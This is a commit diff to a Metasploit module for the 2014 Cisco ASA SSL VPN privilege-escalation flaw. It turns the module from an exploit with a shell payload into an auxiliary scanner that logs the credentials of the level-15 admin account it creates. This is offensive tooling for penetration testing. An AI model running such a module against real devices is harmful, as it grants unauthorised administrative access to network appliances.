5
5
6
6
require 'msf/core'
7
7
8
- class Metasploit3 < Msf ::Exploit :: Remote
8
+ class Metasploit3 < Msf ::Auxiliary
9
9
Rank = ExcellentRanking
10
10
11
11
include Msf ::Exploit ::Remote ::HttpClient
12
- include Msf ::Auxiliary ::CommandShell
12
+ include Msf ::Auxiliary ::Report
13
+ include Msf ::Auxiliary ::Scanner
13
14
14
15
attr_accessor :ssh_socket
15
16
@@ -33,25 +34,6 @@ def initialize(info = {})
33
34
[ 'URL' , 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa' ] ,
34
35
[ 'URL' , 'https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt' ]
35
36
] ,
36
- 'Targets' => [ [ 'Automatic' , { } ] ] ,
37
- 'DefaultOptions' =>
38
- {
39
- 'ExitFunction' => "none"
40
- } ,
41
- 'Payload' =>
42
- {
43
- 'Compat' => {
44
- 'PayloadType' => 'cmd_interact' ,
45
- 'ConnectionType' => 'find'
46
- }
47
- } ,
48
- 'Platform' => 'unix' ,
49
- 'Arch' => ARCH_CMD ,
50
- 'Targets' =>
51
- [
52
- [ 'Cisco ASA' , { } ] ,
53
- ] ,
54
- 'Privileged' => true ,
55
37
'DisclosureDate' => "April 9, 2014" ,
56
38
57
39
) )
@@ -296,7 +278,20 @@ def exploit
296
278
297
279
if creds
298
280
print_good ( "#{ peer } - Successfully added level 15 account #{ creds . join ( ", " ) } " )
299
- break
281
+
282
+ user , pass = creds
283
+
284
+ report_hash = {
285
+ :host => rhost ,
286
+ :port => rport ,
287
+ :sname => 'Cisco ASA SSL VPN Privilege Escalation' ,
288
+ :user => user ,
289
+ :pass => pass ,
290
+ :active => true ,
291
+ :type => 'password'
292
+ }
293
+
294
+ report_auth_info ( report_hash )
300
295
else
301
296
print_good ( "#{ peer } - Failed to created user account" )
302
297
end
0 commit comments